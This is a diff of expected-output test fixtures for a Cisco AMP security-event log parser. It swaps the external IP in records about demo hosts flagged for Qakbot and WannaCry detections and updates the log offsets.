{ "ip": "10.10.10.10", 
@@ -211,7 +211,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 3794, + "log.offset": 3809, "related.hash": [ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], @@ -220,7 +220,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -232,7 +232,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -271,7 +271,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 4969, + "log.offset": 4989, "process.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", "process.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", @@ -285,7 +285,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -301,7 +301,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -341,7 +341,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 6511, + "log.offset": 6536, "related.hash": [ "b5ede95ec8bc4ad6984758be42b152bd", "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", @@ -352,7 +352,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -368,7 +368,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -407,7 +407,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 7890, + "log.offset": 7920, "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", "process.name": "28242311.exe", "process.pid": 4788, @@ -419,7 +419,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -435,7 +435,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -475,7 +475,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 9339, + "log.offset": 9374, "related.hash": [ "b5ede95ec8bc4ad6984758be42b152bd", "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", @@ -486,7 +486,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -502,7 +502,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -534,7 +534,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 10708, + "log.offset": 10748, "related.hash": [ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], @@ -543,7 +543,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -555,7 +555,7 @@ "@timestamp": "2021-01-14T20:18:05.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -587,7 +587,7 @@ "host.hostname": "Demo_Qakbot_3", "host.name": "Demo_Qakbot_3", "input.type": "log", - "log.offset": 11817, + "log.offset": 11862, "related.hash": [ "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" ], @@ -596,7 +596,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -608,7 +608,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -642,7 +642,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 12926, + "log.offset": 12976, "related.hash": [ "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], @@ -651,7 +651,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -663,7 +663,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -697,7 +697,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 14119, + "log.offset": 14174, "related.hash": [ "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], @@ -706,7 +706,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -718,7 +718,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -752,7 +752,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 15312, + "log.offset": 15372, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -761,7 +761,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -773,7 +773,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -807,7 +807,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 16498, + "log.offset": 16563, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -816,7 +816,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -828,7 +828,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -862,7 +862,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 17684, + "log.offset": 17754, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -871,7 +871,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -883,7 +883,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -917,7 +917,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 18870, + "log.offset": 18945, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -926,7 +926,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -938,7 +938,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -972,7 +972,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 20056, + "log.offset": 20136, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -981,7 +981,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -993,7 +993,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1027,7 +1027,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 21242, + "log.offset": 21327, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1036,7 +1036,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1048,7 +1048,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1082,7 +1082,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 22428, + "log.offset": 22518, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1091,7 +1091,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1103,7 +1103,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1137,7 +1137,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 23614, + "log.offset": 23709, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1146,7 +1146,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1158,7 +1158,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1192,7 +1192,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 24800, + "log.offset": 24900, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1201,7 +1201,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1213,7 +1213,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1247,7 +1247,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 25986, + "log.offset": 26091, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1256,7 +1256,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1268,7 +1268,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1302,7 +1302,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 27172, + "log.offset": 27282, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1311,7 +1311,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1323,7 +1323,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1357,7 +1357,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 28358, + "log.offset": 28473, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1366,7 +1366,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1378,7 +1378,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1412,7 +1412,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 29544, + "log.offset": 29664, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1421,7 +1421,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1433,7 +1433,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1467,7 +1467,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 30737, + "log.offset": 30862, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -1476,7 +1476,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1488,7 +1488,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1527,7 +1527,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 31923, + "log.offset": 32053, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, @@ -1539,7 +1539,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1555,7 +1555,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1594,7 +1594,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 33372, + "log.offset": 33507, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, @@ -1606,7 +1606,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1622,7 +1622,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1663,7 +1663,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 34828, + "log.offset": 34968, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, @@ -1677,7 +1677,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" 
@@ -1693,7 +1693,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1734,7 +1734,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 36357, + "log.offset": 36502, "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "process.name": "tasksche.exe", "process.pid": 2920, @@ -1748,7 +1748,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -1764,7 +1764,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1796,7 +1796,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 37912, + "log.offset": 38062, "related.hash": [ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], @@ -1805,7 +1805,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1817,7 +1817,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -1849,7 +1849,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 39032, + "log.offset": 39187, "related.hash": [ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], @@ -1858,7 +1858,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1870,7 +1870,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1902,7 +1902,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 40152, + "log.offset": 40312, "related.hash": [ "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], @@ -1911,7 +1911,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -1923,7 +1923,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -1955,7 +1955,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 41272, + "log.offset": 41437, "related.hash": [ "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], @@ -1964,7 +1964,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -1976,7 +1976,7 @@ "@timestamp": "2021-01-14T19:29:11.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2008,7 +2008,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 42392, + "log.offset": 42562, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2017,7 +2017,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2029,7 +2029,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2063,7 +2063,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 43512, + "log.offset": 43687, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2072,7 +2072,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2084,7 +2084,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
@@ -2118,7 +2118,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 44698, + "log.offset": 44878, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2127,7 +2127,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2139,7 +2139,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2173,7 +2173,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 45884, + "log.offset": 46069, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2182,7 +2182,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ @@ -2194,7 +2194,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2228,7 +2228,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 47070, + "log.offset": 47260, "related.hash": [ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], @@ -2237,7 +2237,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "service.type": "cisco", "tags": [ 
@@ -2249,7 +2249,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2290,7 +2290,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 48256, + "log.offset": 48451, "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", @@ -2306,7 +2306,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2322,7 +2322,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", @@ -2363,7 +2363,7 @@ "host.os.family": "windows", "host.os.platform": "windows", "input.type": "log", - "log.offset": 49887, + "log.offset": 50087, "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", @@ -2379,7 +2379,7 @@ ], "related.ip": [ "10.10.10.10", - "8.8.8.8" + "175.16.199.1" ], "related.user": [ "user@testdomain.com" @@ -2395,7 +2395,7 @@ "@timestamp": "2021-01-14T19:29:10.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.external_ip": "175.16.199.1", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", 
